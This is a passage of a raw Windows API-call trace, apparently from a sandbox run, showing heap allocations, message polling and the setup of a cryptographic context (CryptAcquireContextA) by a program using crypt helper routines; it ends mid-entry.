[0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0233.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0233.313] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0233.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.314] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0233.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0233.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0233.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.315] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0233.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0233.315] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0233.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0233.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0233.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0233.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.316] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0233.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0233.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0233.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0233.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0233.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0233.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0233.317] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0233.318] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.318] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.318] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.318] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.318] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0233.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0233.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0233.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0233.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.319] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.319] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.319] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0233.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0233.319] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.319] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.319] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0233.319] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0233.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.320] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0233.320] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0233.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0233.321] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.321] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.321] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0233.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.321] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0233.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0233.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0233.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0233.321] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.322] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0233.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0233.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.323] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0233.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0233.324] RtlAllocateHeap (HeapHandle=0x970000, 